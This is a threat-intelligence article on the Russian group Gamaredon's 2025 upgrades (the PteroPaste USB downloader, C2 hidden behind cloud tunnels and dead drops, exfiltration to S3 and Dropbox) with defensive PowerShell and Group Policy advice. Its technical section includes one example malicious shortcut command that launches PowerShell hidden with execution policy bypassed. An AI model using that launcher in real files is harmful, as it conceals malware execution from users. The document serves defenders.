Russia's 'Gamaredon' Upgrades Its Arsenal, Requiring New Defenses

Summary

Russia's long-running Gamaredon cyber-espionage group — also tracked as Aqua Blizzard, Armageddon, and BlueAlpha — has substantially modernized its toolkit and command-and-control (C2) practices, according to new research from ESET. Over the course of 2025 the group ran 35 distinct spear-phishing campaigns against Ukraine, rolled out roughly half a dozen new PowerShell downloaders, and adopted layered techniques for concealing its infrastructure behind trusted cloud and tunneling services. The upgrades let the FSB-linked actor mount more frequent and larger operations in the second half of the year, including handing off initial access to fellow Russian APT Turla.

A veteran APT that refuses to age out

Gamaredon has been operating since at least 2013, an unusually long run for a state-aligned threat actor, and it remains one of the Russian government's busiest and most actively evolving groups. Ukraine's Security Service attributes the operation to the 18th Center for Information Security inside Russia's Federal Security Service (FSB). Its targeting has stayed consistent: throughout 2025 its spear-phishing exclusively went after Ukrainian government and military organizations, with the goal of exfiltrating data that could advance Russia's war effort.

ESET frames the group's year in two phases. The first half was largely preparatory. Gamaredon appears to have taken January off — likely because its operators are government employees and Russia clusters many federal holidays in that month — then resumed activity in February. Much of the early year went into building tooling that would pay off later: five new PowerShell programs in the first quarter and one more in the summer. Most are simple downloaders, but one stands out.

PteroPaste and USB-borne spreading

The most capable of the new tools, dubbed PteroPaste, goes beyond basic download-and-execute functionality. It continuously polls for USB drives attached to a compromised host. When it finds one, it tries to copy a malicious downloader script onto the drive. To make the payload look innocuous, it picks a random Word document already on the infected machine, appends a .lnk extension to that filename, and assigns that name to the smuggled loader — so a casual observer is likely to mistake it for an ordinary document.

USB drives have long been a Gamaredon staple for pushing malware both farther geographically and deeper inside target organizations, where more sensitive systems may be air-gapped and otherwise isolated from the internet.

ESET's director of threat research, Jean-Ian Boutin, recommends tightening PowerShell exposure to blunt both PteroPaste and its simpler relatives: "Depending on business needs and user roles, organizations may restrict or remove PowerShell access for non-administrative users, or disable or limit unnecessary scripting capabilities, such as Windows Management Instrumentation (WMI)."

For the USB vector, the mitigations are operational: scan files on removable media, sanitize drives at dedicated stations, or simply block unvetted devices outright.

Hiding C2 behind legitimate services

Alongside its new initial-access malware, Gamaredon has invested heavily in concealing its C2 footprint. The group has started routing activity through Microsoft and Cloudflare tunneling services, and through Cloudflare serverless workers, so that malicious traffic appears to flow to legitimate domains. It also relies on dead drops — pointing malware at legitimate websites where the real C2 address is hidden — to frustrate analysis and blocklisting. Most recently it has fused the two approaches, stashing its tunneling domains at those dead-drop sites.

Two of Gamaredon's primary stealer tools were also updated to push stolen files into legitimate cloud storage, such as Amazon S3 buckets, while PteroPaste exfiltrates to Dropbox.

That shift undercuts a common defensive assumption. "Defenders can no longer assume that traffic to a trusted platform is inherently safe," said Louis Eichenbaum, federal CTO at ColorTokens. "Instead, they must determine whether that communication is expected, authorized, and consistent with normal application and user behavior." He argues defenders need a detailed grasp of application workflows and communication patterns so they can apply "granular, identity-aware microsegmentation policies that break attack paths and contain compromises before they spread."

Scaling up — and partnering with Turla

With its loaders rebuilt and its infrastructure obscured, Gamaredon used the back half of 2025 to launch markedly more attacks, and bigger ones, than in the first half. Some of that activity was part of an ongoing collaboration with another Russian state APT, Turla (also known as Snake, Venomous Bear, Waterbug, or Ouroboros): Gamaredon supplied initial access via its loader library, which Turla then leveraged to deploy its heavier Kazuar exploitation framework.

Technical background

The following is general context on the techniques described above; the specifics of this campaign are limited to what ESET reported and the details listed in the sections above.

USB autorun-style spreading. Malware that abuses removable media typically drops a small loader and a disguised shortcut so a user double-clicks it manually. A malicious .lnk file usually carries a hidden command line that calls a script interpreter, for example:


%windir%\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File <payload>

On the host side, defenders can detect and limit removable-media execution. To audit which drives are removable from PowerShell:


Get-WmiObject -Class Win32_LogicalDisk -Filter "DriveType=2" |
  Select-Object DeviceID, VolumeName, Size

Group Policy can deny execute rights on removable storage via Computer Configuration → Administrative Templates → System → Removable Storage Access → All Removable Storage classes: Deny all access.

Constraining PowerShell. Beyond restricting who can run PowerShell, enabling Constrained Language Mode and turning on script block and module logging gives defenders visibility into the obfuscated one-liners these downloaders favor:


# Enable script block logging via registry
New-Item -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging' -Force
Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging' -Name 'EnableScriptBlockLogging' -Value 1

Living-off-trusted-services C2. When adversaries tunnel through Cloudflare/Microsoft services or exfiltrate to S3 and Dropbox, simple domain blocklists fail. The practical countermeasures are behavioral: baseline which hosts and identities normally talk to which SaaS endpoints, alert on deviations (a workstation suddenly uploading to a Dropbox or S3 endpoint it has never used), and enforce identity-aware microsegmentation to contain lateral movement.

Bottom line

Gamaredon's 2025 evolution shows a mature APT deliberately retooling: new PowerShell downloaders, USB-based propagation into air-gapped segments, C2 cloaked inside legitimate cloud and tunneling platforms, and operational handoffs to Turla. Defenses that depend on static indicators or on trusting reputable domains will lag this group. Restricting PowerShell and WMI for non-admin users, controlling removable media, and adopting behavior- and identity-based monitoring of SaaS traffic are the measures best matched to how this actor now operates.